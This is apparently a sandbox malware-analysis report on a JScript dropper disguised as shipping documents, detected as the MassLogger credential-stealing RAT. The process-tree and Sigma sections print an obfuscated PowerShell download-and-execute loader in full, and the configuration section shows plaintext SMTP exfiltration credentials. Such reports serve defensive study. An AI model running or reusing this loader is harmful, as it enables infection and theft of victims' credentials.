Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
Shipping Documents SI 694_pdf.js

Overview

General Information

Sample name:Shipping Documents SI 694_pdf.js
Analysis ID:1676212
MD5:e822f6aa3570eb13de7cd31d07d8cca0
SHA1:36ec5a917df2a8c21fc775c25565b60d0d99da5b
SHA256:67182a912dd8c9f738c203e4f666b3136dbe24239d1278e292155629a26a135c
Tags:jsuser-abuse_ch
Infos:

Detection

MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Joe Sandbox ML detected suspicious sample
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7148 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUAaQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($fronts));Invoke-Expression $allocryptic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 6720 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Configuration

Threatname: MassLogger

{
  "EXfil Mode": "SMTP",
  "From": "hee@dermypack.com.my",
  "Password": "Hee@123456789!",
  "Server": "mail.dermypack.com.my"
}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0xefdf:$a1: get_encryptedPassword
          • 0xf307:$a2: get_encryptedUsername
          • 0xed7a:$a3: get_timePasswordChanged
          • 0xee9b:$a4: get_passwordField
          • 0xeff5:$a5: set_encryptedPassword
          • 0x10951:$a7: get_logins
          • 0x10602:$a8: GetOutlookPasswords
          • 0x103f4:$a9: StartKeylogger
          • 0x108a1:$a10: KeyLoggerEventArgs
          • 0x10451:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 25 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          10.2.powershell.exe.1e8a1e165d0.1.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            10.2.powershell.exe.1e8a1e165d0.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              10.2.powershell.exe.1e8a1e165d0.1.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                10.2.powershell.exe.1e8a1e165d0.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  10.2.powershell.exe.1e8a1e165d0.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0xd3df:$a1: get_encryptedPassword
                  • 0xd707:$a2: get_encryptedUsername
                  • 0xd17a:$a3: get_timePasswordChanged
                  • 0xd29b:$a4: get_passwordField
                  • 0xd3f5:$a5: set_encryptedPassword
                  • 0xed51:$a7: get_logins
                  • 0xea02:$a8: GetOutlookPasswords
                  • 0xe7f4:$a9: StartKeylogger
                  • 0xeca1:$a10: KeyLoggerEventArgs
                  • 0xe851:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 29 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_6852.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                    amsi64_6852.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUAaQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUAaQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUAaQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode
                      Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7148, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49685
                      Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 158.101.44.242, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6720, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49696
